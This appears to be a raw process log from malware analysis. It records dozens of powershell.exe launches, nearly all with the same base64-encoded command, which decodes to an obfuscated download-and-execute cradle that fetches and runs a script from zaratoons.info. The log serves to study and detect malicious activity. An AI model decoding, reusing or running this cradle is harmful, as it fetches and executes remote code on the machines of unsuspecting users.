"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
132
5360
powershell.exe
2456
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
133
5388
powershell.exe
1332
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
134
5396
powershell.exe
2540
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
135
5404
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
136
5456
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
137
5492
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
138
5572
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
139
5656
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
140
5684
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
141
5720
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
142
5736
powershell.exe
3104
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Created
Created
Created
Opened
Read_From
Process
143
5744
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
144
5752
powershell.exe
688
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Opened
Opened
Opened
Process
145
5776
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
146
5796
powershell.exe
2280
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
147
5820
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
148
5916
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
149
5996
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
150
6048
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
151
6108
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
152
6132
powershell.exe
3168
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Opened
Created
Created
Created
Opened
Read_From
Process
153
5244
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Child_Of
Created
Opened
Created
Opened
Process
154
4188
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
155
4216
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
156
5416
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
157
5476
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
158
4384
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Created
Opened
Opened
Opened
Process
159
5708
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
160
4600
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
161
4744
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
162
6064
powershell.exe
2880
powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==
C:\Windows\system32\
c:\windows\system32\windowspowershell\v1.0\powershell.exe
Created
Process
163
2812
powershell.exe
2880
powershell.exe
